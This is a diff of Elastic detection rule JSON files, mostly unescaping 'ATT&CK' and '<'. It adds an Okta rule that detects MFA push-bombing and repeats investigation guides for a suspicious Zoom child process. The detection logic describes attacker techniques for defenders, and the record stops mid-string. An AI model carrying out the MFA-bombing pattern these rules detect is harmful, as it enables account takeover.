a/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_104.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_205.json b/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_205.json index c5ccde38786..9210b21f634 100644 --- a/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_205.json +++ b/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_205.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_102.json b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_102.json index b41ccbbdf39..46529cca26f 100644 --- a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_102.json +++ b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_102.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_103.json b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_103.json index bf37b566107..f1708fab078 100644 --- a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_103.json +++ b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_103.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_104.json b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_104.json index 8a731088fc8..a8f820da4d8 100644 --- a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_104.json +++ b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_104.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_105.json b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_105.json index d72d87fc121..924511d3544 100644 --- a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_105.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_106.json b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_106.json index 34bc07c264a..9f9676f2ff7 100644 --- a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_106.json +++ b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_106.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_207.json b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_207.json index ab9747ad731..74bfa7d1a13 100644 --- a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_207.json +++ b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_207.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_208.json b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_208.json index 9bbd608470f..54c08aa5c45 100644 --- a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_208.json +++ b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_208.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_209.json b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_209.json new file mode 100644 index 00000000000..8cbf7c96114 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_209.json @@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when an attacker abuses the Multi-Factor authentication mechanism by repeatedly issuing login requests until the user eventually accepts the Okta push notification. An adversary may attempt to bypass the Okta MFA policies configured for an organization to obtain unauthorized access.", + "event_category_override": "event.category", + "index": [ + "filebeat-*", + "logs-okta*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potentially Successful MFA Bombing via Push Notifications", + "note": "## Triage and analysis\n\n### Investigating Potential Abuse of Repeated MFA Push Notifications\n\nMulti-Factor Authentication (MFA) is an effective method to prevent unauthorized access. However, some adversaries may abuse the system by repeatedly sending MFA push notifications until the user unwittingly approves the access.\n\nThis rule detects when a user denies MFA Okta Verify push notifications twice, followed by a successful authentication event within a 10-minute window. This sequence could indicate an adversary's attempt to bypass the Okta MFA policy.\n\n#### Possible investigation steps:\n\n- Identify the user who received the MFA notifications by reviewing the `user.email` field.\n- Identify the time, source IP, and geographical location of the MFA requests and the subsequent successful login.\n- Review the `event.action` field to understand the nature of the events. It should include two `user.mfa.okta_verify.deny_push` actions and one `user.authentication.sso` action.\n- Ask the user if they remember receiving the MFA notifications and subsequently logging into their account.\n- Check if the MFA requests and the successful login occurred during the user's regular activity hours.\n- Look for any other suspicious activity on the account around the same time.\n- Identify whether the same pattern is repeated for other users in your organization. Multiple users receiving push notifications simultaneously might indicate a larger attack.\n\n### False positive analysis:\n\n- Determine if the MFA push notifications were legitimate. Sometimes, users accidentally trigger MFA requests or deny them unintentionally and later approve them.\n- Check if there are known issues with the MFA system causing false denials.\n\n### Response and remediation:\n\n- If unauthorized access is confirmed, initiate your incident response process.\n- Alert the user and your IT department immediately.\n- If possible, isolate the user's account until the issue is resolved.\n- Investigate the source of the unauthorized access.\n- If the account was accessed by an unauthorized party, determine the actions they took after logging in.\n- Consider enhancing your MFA policy to prevent such incidents in the future.\n- Encourage users to report any unexpected MFA notifications immediately.\n- Review and update your incident response plans and security policies based on the findings from the incident.", + "query": "sequence by okta.actor.id with maxspan=10m\n [authentication where event.dataset == \"okta.system\" and event.module == \"okta\"\n and event.action == \"user.mfa.okta_verify.deny_push\"] with runs=3\n [authentication where event.dataset == \"okta.system\" and event.module == \"okta\"\n and (event.action : (\n \"user.authentication.sso\",\n \"user.authentication.auth_via_mfa\",\n \"user.authentication.verify\",\n \"user.session.start\") and okta.outcome.result == \"SUCCESS\")]\n", + "references": [ + "https://www.mandiant.com/resources/russian-targeting-gov-business", + "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", + "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", + "https://www.rezonate.io/blog/okta-logs-decoded-unveiling-identity-threats-through-threat-hunting/" + ], + "related_integrations": [ + { + "package": "okta", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.actor.id", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.outcome.result", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Use Case: Identity and Access Audit", + "Tactic: Credential Access", + "Data Source: Okta" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1621", + "name": "Multi-Factor Authentication Request Generation", + "reference": "https://attack.mitre.org/techniques/T1621/" + } + ] + } + ], + "type": "eql", + "version": 209 + }, + "id": "97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_209", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_104.json b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_104.json index e02123a9411..4eb0d3c2605 100644 --- a/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_104.json +++ b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_104.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "97aba1ef-6034-4bd3-8c1a-1e0996b27afa", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_105.json b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_105.json index 24defa46883..da3bccbd756 100644 --- a/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_105.json +++ b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_105.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "97aba1ef-6034-4bd3-8c1a-1e0996b27afa", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_106.json b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_106.json index 33b015b8597..c9f5485a549 100644 --- a/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_106.json +++ b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Zoom Child Process", - "note": "## Triage and analysis\n\n### Investigating Suspicious Zoom Child Process\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading, and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `Zoom.exe` or exploiting a vulnerability in the application causing it to execute code.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line of the child process to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Zoom Child Process\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading, and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `Zoom.exe` or exploiting a vulnerability in the application causing it to execute code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line of the child process to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"Zoom.exe\" and process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")\n", "related_integrations": [ { @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_107.json b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_107.json index ed17482a0c8..ed8c14b201c 100644 --- a/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_107.json +++ b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_107.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Zoom Child Process", - "note": "## Triage and analysis\n\n### Investigating Suspicious Zoom Child Process\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading, and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `Zoom.exe` or exploiting a vulnerability in the application causing it to execute code.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line of the child process to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Zoom Child Process\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading, and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `Zoom.exe` or exploiting a vulnerability in the application causing it to execute code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line of the child process to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"Zoom.exe\" and process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")\n", "related_integrations": [ { @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_108.json b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_108.json index d7b825620a8..0376915f222 100644 --- a/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_108.json +++ b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_108.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Zoom Child Process", - "note": "## Triage and analysis\n\n### Investigating Suspicious Zoom Child Process\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading, and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as 